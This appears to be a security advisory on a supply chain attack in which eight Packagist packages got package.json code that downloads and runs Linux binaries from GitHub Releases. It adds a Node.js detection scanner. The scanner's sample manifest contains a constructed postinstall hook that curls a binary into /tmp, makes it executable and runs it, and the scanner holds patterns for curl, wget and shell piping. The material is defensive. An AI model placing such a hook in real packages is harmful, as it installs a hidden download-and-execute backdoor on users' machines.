1. Threat Overview
A coordinated supply chain attack campaign has compromised eight Composer packages on Packagist. Malicious code was injected into the packages' package.json files; when run, it retrieves Linux binaries from GitHub Releases URLs and executes them. The campaign targets projects that ship JavaScript, and any project depending on these packages is affected. The attack vector is code injection.
2. Key Intelligence Points
1. Malicious code injected into package.json files retrieves Linux binaries from GitHub Releases URLs and runs them.
2. Eight Composer packages on Packagist are affected, targeting projects that ship JavaScript.
3. The attack chain consists of retrieving Linux binaries from GitHub Releases URLs and executing them.
4. Detection opportunity: monitor for suspicious GitHub Releases URL access and for execution of Linux binaries fetched that way.
3. MITRE ATT&CK Techniques
T1204.001: User Execution of Malicious Code via GitHub Releases URL
4. Indicators of Compromise (IOCs) / Affected Systems
Indicator types (specific values are not listed on this page): the GitHub Releases URLs, the Linux binary filenames, and the affected package versions.
5. Mitigation & Detection
Update the affected packages to the latest (cleaned) version, monitor for suspicious GitHub Releases URL access and for execution of Linux binaries fetched from such URLs, and block access to the malicious GitHub Releases URLs; the page recommends a web application firewall for this, though note that a WAF inspects inbound traffic, so blocking outbound downloads in practice is an egress-filtering or proxy control.
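As an added detection example for the opportunity noted in the intelligence points and the mitigation section above (not code from the advisory or from any affected package), the following Node.js scanner flags package.json scripts entries that match the described chain: a hook that fetches from a GitHub Releases URL and then executes the download. It assumes the injected code lives in the scripts block, the only place a package.json can carry commands; every package name, URL and path in it is constructed.

```javascript
// Added example (not from the advisory): flag package.json "scripts" entries that
// match the chain described above (a hook fetching a Linux binary from a GitHub
// Releases URL and executing it). All names and sample data are constructed.
// npm/yarn hooks that run without the user invoking them explicitly.
const LIFECYCLE_HOOKS = new Set(['preinstall', 'install', 'postinstall', 'prepare',
  'prepublish', 'prepublishOnly', 'prepack', 'postpack']);
// Shape of a GitHub Releases asset download URL.
const RELEASE_URL = /https?:\/\/github\.com\/[\w.-]+\/[\w.-]+\/releases\/download\/[^\s'"]+/g;
// A downloader, and hints that the fetched file is made executable or run.
const FETCH_TOOL = /\b(curl|wget)\b/;
const EXEC_HINT = /chmod\s+(\+x|[0-7]{3,4})\b|\|\s*(sh|bash)\b|&&\s*(\.\/|\/)[\w.\/-]+\s*(&&|;|$)/;

// Returns one finding per script that references a GitHub Releases URL;
// severity is "high" when an auto-run hook both fetches and executes.
function scanPackageJson(text, source = 'package.json') {
  let pkg;
  try {
    pkg = JSON.parse(text);
  } catch (err) {
    // A manifest that will not parse is itself worth a look.
    return [{ source, script: null, reason: 'unparseable package.json' }];
  }
  const scripts = (pkg && typeof pkg.scripts === 'object' && pkg.scripts) || {};
  const findings = [];
  for (const [name, cmd] of Object.entries(scripts)) {
    if (typeof cmd !== 'string') continue;
    const urls = cmd.match(RELEASE_URL) || [];
    if (urls.length === 0) continue;
    const lifecycle = LIFECYCLE_HOOKS.has(name);
    const fetchesBinary = FETCH_TOOL.test(cmd);
    const executesBinary = EXEC_HINT.test(cmd);
    findings.push({
      source, script: name, lifecycle, urls, fetchesBinary, executesBinary,
      severity: lifecycle && fetchesBinary && executesBinary ? 'high' : 'medium',
    });
  }
  return findings;
}

// Constructed manifests: a clean one and one carrying an injected postinstall hook.
const CLEAN_MANIFEST = JSON.stringify({ name: 'demo-assets', scripts: { build: 'vite build' } });
const INJECTED_MANIFEST = JSON.stringify({
  name: 'demo-assets',
  scripts: {
    build: 'vite build',
    postinstall: 'curl -sL https://github.com/example-org/example-repo/releases/download/v1.0/runner-linux -o /tmp/.r && chmod +x /tmp/.r && /tmp/.r',
  },
});
```

In practice the function is run over every vendor/**/package.json pulled in by Composer, so that a hook of this shape is found before any install step executes it.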